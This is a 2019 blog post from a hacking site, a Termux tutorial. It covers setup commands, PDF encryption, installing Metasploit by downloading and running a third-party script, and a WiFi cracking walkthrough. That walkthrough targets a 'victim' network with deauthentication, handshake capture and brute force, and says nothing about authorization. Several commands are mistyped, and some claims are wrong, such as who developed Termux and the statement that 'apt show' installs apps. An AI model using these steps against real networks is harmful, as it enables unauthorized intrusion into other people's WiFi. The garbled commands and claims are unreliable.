• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2019
  • May
  • 3
  • Termux Hacks Guide – Commands, Tools and Tutorials

Termux Hacks Guide – Commands, Tools and Tutorials

May 3, 2019May 19, 2019 Comments Off on Termux Hacks Guide – Commands, Tools and Tutorials
how to hack with termux termux commands termux hack tutorials termux hacking guide termux hacking guide 2019 termux hacks

A Third Party developer called “Anonymous” has developed a Linux-self contained App called “Termux” which is used to install Linux based apps in Android and helps in running pure Linux apps in Android.

In this guide we will learn about various Termux hacks, termux tutorials, termux wifi hack commands list, termux guide, termux tools, apk & packages & termux uses.

Now you will be wondering why do I need LINUX apps?

LINUX has a history of being a programmer centric so the purpose of TERMUX app is to help Cyber Security professionals in monitoring systems and Cyber Security practices like Penetration Testing through Mobile Networks.

Termux hacks : 2019

TERMUX apps like HYDRA and NMAP are easy to use and install. They are also platform independent and their Android versions are also identical to their LINUX versions.

TERMUX’s uniqueness lies in its non-rooting installation facility. Rooting means having privileged facility over applications installed.

This feature makes it easy for users to install complex software like NMAP and HYDRA.

Termux Tools

NMAP is an open source Network mapper written by Gordon Lyon (also known as Fyodor Vaskovich). As the above suggests, its purpose is to scan for hosts and networks in a particular area through sending specially crafted data packets and analysing their responses. In the hands of Cyber Security experts, it is considered as an effective tool of Network Audit, performing Security Scans and for conducting other similar Network Security Activities.

‘NMAP’ can be installed in TERMUX by typing the following: “pkg install nmap”. The installation is fast and swift. After that you can use ‘NMAP’ by typing out its name in the terminal.

HYDRA is another command line based computer program capable of performing dictionary attacks on exposed protocols and networks.

Must have tools

Tool-x allows you to install 240 hacking tools on your mobile phone without root! Ranges from information gathering, scanning tools, bruteforce, wifi hacking, vulnerability exploiting and much more.

If you want to install a separate mobile penetration testing toolkit, you should use Andrax.

 

With the ease of use for Termux, you can almost install any tool used in hacking operating systems. – View our hacking tools directory to download more tools.

Termux Guide

Termux is available on Google PlayStore and F-Droid. Its free download and easy to use. One must also download its plugins which help the app interface with Android API.

Pro Tip :

Also download Hacker Keyboard which has CTRL and ESC buttons in it. You’ll be needing it while working in the app. Better get it from F-Droid.

Let’s set it up now that we have downloaded the app. Since it’s a command line app like DOS, you have to rely on your memorising skills to master the app. Type the command: “pkg upgrade” to update all the built in packages then run “touch.hushlogin”. This helps unlock all the packages which you will require for your work.

For Example, a certain Mr. Konrad had after downloading the app acquired the following packages: Python, Ruby, NodeJS, GO and C Programming through the following magical code:

pkg install python cmakenodejs ruby golang

Moving on to setting workspace. TERMUX provides the following as default save location for all your files:

/data/data/com.termux/files/home    

But you can also change location by using the following example code:

mkdir notes gh homework temp

Next is configuring the dotfiles. Following is an example:

cd gh && git clone https://github.com/konradit/dotfiles.git && cp dotfiles/bashrc ~/.bashrc

Now install the basic packages using the following example and then Type exit to exit and enter the terminal again. The code is:

pkg install coreutilstermux-apitermux-exec termux-tools grep tree ncurses-utilsopensshgpg

Now you got a wicked terminal. Shorthand commands are:

n: cd $HOME/notes
nn: cd $HOME/notes && vim
t: cd $HOME/temp
gh: cd $HOME/gh
hh: cd $HOME/homework

Additionally you can just type the name of the directory and cd to it.If you want to have tmux run automatically when you enter the shell:

echo “tmux” >> ~/.bashrc

Pro tip: long press to copy/paste, change color scheme and change font!

The uses of TERMUX are limitless. There are people who host servers using it, some download youtube videos using it as sort of incognito mode methods plus there are also you-know “research” stuff done by certain individuals.

Given it’s a software, its list of useful commands are also limitless. Below is a list of sample commands provided by my friends used in TERMUX acquired by me due to sheer lack of proper resource material available for this paper. Here are the codes with their descriptions:

pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir ‘dir-name For creating directory
cd “dir-name” For changing directory
cat “file-name” For reading any file
mv /path/file  /path where file is moved For moving files from one path to another.
cp  /path/file  /path where to copy file For copying files from one path to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping “website URL” Helps verify IP level connectivity
toilet -f mono12 -F gay “your text” Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Also read: OSIF – Open Source Information Facebook

How To Hack Using Termux ?

#1. How to encrypt, decrypt PDF files using TERMUX

Following is the list of “ingredients” required for preparing this combo:

  1. Termux : Download Link
  2. PDF Unlocker: Download Link
  3. GitHub Link: https://github.com/jesparza/peepdf.git

Step #1: Run TERMUX, execute the following code and Press Enter. The code is:

“pkg update &&pkg upgrade &&pkg install python2 &&pkg install git”

The Result? The mentioned packages are installed in your system.

Step#2: Type the following code and press ENTER. The code is:“cd peepdf”.

Step #3: Now type command chmod +x peepdf.py and Press Enter

Step #4: Type command python2 peepdf.py -i and press Enter.

The steps above help in installation of PDF Unlocker in system.

Now we come to the Encryption part.

Step#1: After opening the PDF, type command encrypt Yourpassword Here “YourPassword” is Password for PDF file to open.

Step#2: then type command “save” and press Enter which makes your PDF Password Protected – a note pops up on your screen describing the same.

#1.1. How to decrypt files

Step#1: Open the file again by command open -f /sdcard/FileName.pdfand press Enter.

Step#2: Then type command decrypt YourPassword and press Enter. Password must be the same as set to encrypt the same PDF. In case of problem, PDF Unlocker is always there to help you out.

#2. Install Metasploit Using Termux

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Following are the steps you need to follow to install Metasploit:

#1: Install Termux from Google Play-Store

#2: Open And Wait it for its Installation process.

#3: Now type this Command

apt update

#4: After updating completed type this command

apt install curl 

#5: Now Type

"cd $HOME"

#6: Now type/copy this command

curl -LO https://raw.githubusercontent.com/Techzindia/Metasploit_For_Termux/master/metasploitTechzindia.sh

#7: After above file is downloaded, type

ls

#8: You’ll see a .sh file. Now type this command

chmod +x metasploitTechzindia.sh

#9: Now Run A Script By Type Command

sh metasploitTechzindia.sh

You’ll see a process is started. So wait until it ends.

[Warning]: Don’t turn off your data connection or wifi connection.

#10: Now type,

ls

You’ll be seeing a metasploit-framework Folder.

#11: Open a folder by typing in

cd <yourfoldername>

#12: type “ls” command, you’ll see a list of files & folders.

#13: Now Type “./msfconsole” to run Metasploit.

Also read: WhatsApp Hacking using QRLJacking

#3. How To Hack Wifi Using Termux [Termux WiFi hack commands list]

There is one software called “aircrack-ng” which you need to first download using Google’s help. Then follow the steps given below:

First connect your wifi-adapter to your device using an OTG cable

1) Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :

airmon-ng

airmon-ng start wlan0

2) Now start the network detecting by typing this command :

airodump-ng wlan0mon

Here you see your target device and stop the detecting by control + z.

3) Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.

4) Copy victim’s BSSID and also note the target channel CH number and type this command :

airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w

There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon

5) Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :

aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon

now stop attack by control+z and close the terminal

6) now paste the password list in your cap folder and also go into the cap folder directory

Now crack with this command :

aircrack-ng -w pass.list 01.cap

7) this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)

Also read: InstaInsane – Multi-threaded Instagram Brute Forcer

#4. Turn Android Device into a Web Server

First of all I have to say that this experimental is tested and worked only with the Iris web framework, written in Golang and Android version 5.1.

Following are the steps:

#1:Install & open termux

#2:Execute the following commands by order

$ pkg install git
$ pkg install golang
$ export GOPATH=/data/data/com.termux/files/home/go
$ go get -u -v github.com/kataras/iris
$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
$ go run main.go

#3: Open your favorite browser and navigate to http://localhost:8080

Conclusion

Lastly, I would like to conclude that TERMUX is one of the few apps whose overall utility is limitless.Termux allows you to have a portable hacking machine wherever you go!

Knowing how to use termux and android secret codes will make you an expert in android hacking.

Post navigation

How to Fix and Update Kali Linux Repositories
Most Important Cyber Incident Response Tools List for Security Professionals

Related Articles

Andrill – Vulnerable Mobile Application with Various Levels

- Mobile Hacking
August 2, 2019

Yaazhini – Free Android APK & API Vulnerability Scanner

- Mobile Hacking
June 12, 2019

ANDRAX v3 – The First And Unique Penetration Testing Platform For Android Smartphones

- Mobile Hacking
June 12, 2019June 12, 2019
hacker gadgets
hacker phone covers

Recent Posts

Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

Yaralyzer – Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

January 29, 2023
Austrian Resold Drugs Purchased on The Dark Web

Austrian Resold Drugs Purchased on The Dark Web

January 29, 2023
SSTImap - Automatic SSTI Detection Tool With Interactive Interface

SSTImap – Automatic SSTI Detection Tool With Interactive Interface

January 28, 2023
Octosuite v3.0.4 releases: Advanced Github OSINT Framework

Octosuite v3.0.4 releases: Advanced Github OSINT Framework

January 28, 2023
firebaseExploiter: discovers open and exploitable Firebase Database

firebaseExploiter: discovers open and exploitable Firebase Database

January 28, 2023
CISA Warns of Hackers Exploiting CVE-2017-11357 Vulnerability

CISA Warns of Hackers Exploiting CVE-2017-11357 Vulnerability

January 27, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Join Our Community!

Please wait...
Get the latest News and Hacking Tools delivered to your inbox.
Don't Worry ! You will not be spammed

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW